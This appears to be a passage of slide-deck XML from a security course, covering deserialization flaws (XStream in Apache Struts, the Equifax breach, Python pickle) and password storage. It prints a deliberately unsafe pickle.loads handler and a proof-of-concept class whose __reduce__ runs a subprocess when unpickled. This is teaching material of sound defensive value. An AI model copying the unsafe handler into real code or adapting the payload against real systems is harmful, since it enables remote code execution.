            <a:off x="5187200" y="3067800"/>
            <a:ext cx="37782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 “email”: “mike@example.com”, “name”: “Mike” }”</a:t>
            </a:r>
            <a:endParaRPr sz="12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2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Serialization Overview</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1950" name="Google Shape;1950;p276"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="31962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More complex usages of serialization is turning XML documents into models and classes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Most languages have their own way of taking Objects &amp; turning into “bytes”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They all share the same security concern: Deserializing untrusted data can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker-controlled code execution</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="E06666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If the XML document contains references to things like system classes or wrappers around shell commands, then deserializing data could execute that code</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="BA2121"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="160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2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Apache Struts and Equifax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1956" name="Google Shape;1956;p277"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="31632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Apache Struts uses the Java XStream serialization library, for converting XML documents into classes, and vice-versa</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XStream performs unsafe deserialization. An attacker could supply a malicious XML file that references system classes, and upon deserialization, would execute system code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This bug led to the largest data breach in history: the 2017 Equifax breach</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Side note: The bug had been patched in Apache Struts. Equifax failed to update their packages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Follow vulnerability mailing lists, and stay up to date with the latest releases of dependencies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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2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Apache Struts and Equifax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1962" name="Google Shape;1962;p278"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="449581" y="1017725"/>
            <a:ext cx="8475819" cy="32979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279"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="77649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Serialization Exploitation: Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1968" name="Google Shape;1968;p279"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="8488500" cy="1663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Python’s serialization format is called “Pickle”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Deserializing untrusted pickles is really easy to exploit in Python</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Consider the following code:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This allows the provider of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>user_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arbitrary Python code.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="E06666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="E06666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1969" name="Google Shape;1969;p279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447200" y="2401845"/>
            <a:ext cx="6249600" cy="11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Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>import base64, pickle</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>def create_object_handler(user_data):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    return pickle.loads(base64.b64decode(user_data))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>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280"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="75657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Serialization Exploitation: Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1975" name="Google Shape;1975;p280"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="8020500" cy="16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dirty="0"/>
              <a:t>Pickle encodes everything needed for deserialization, even “type” information!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>An attacker can create classes that run OS commands when deserialized: </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1976" name="Google Shape;1976;p280"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2376875" y="2168525"/>
            <a:ext cx="6342900" cy="21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Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>import base64, pickle, subprocess</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>class RunCommand(object):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t># reduce provides guidance on how to deserialize</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>   def __reduce__(self):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t># “when deserializing me, run a OS command!”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>     return (subprocess.Popen, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>             (('open', '/Applications/Calculator.app'),))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>payload = base64.b64encode(pickle.dumps(RunCommand()))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>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46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1204800"/>
            <a:ext cx="8520600" cy="29949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800"/>
              <a:t>Simple hash functions and salts are not enough</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>You can usually Google an MD5 hash to find a corresponding password</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>A modern machine with 8 current gen GPU’s can perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1"/>
              <a:t>777 trillion hashes per day</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Also, rainbow tables (salts hinder these)</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Store passwords using either bcrypt or PBKDF2</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>bcrypt is more widely used for password storage</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Use a minimum of 1024 iterations of hashing, and 32-bytes of salt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>PBKDF2 is FIPS-140 approved</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Use a minimum of 10,000 iterations and 32-bytes of salt</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Google Shape;1021;p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Storing Passwords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2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sp>
        <p:nvSpPr>
          <p:cNvPr id="1982" name="Google Shape;1982;p281"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8427600" cy="29622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Understand features and capabilities of a particular </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>serialization format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Generally, JSON is relatively safe so long as it is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>’d</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Be wary of:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
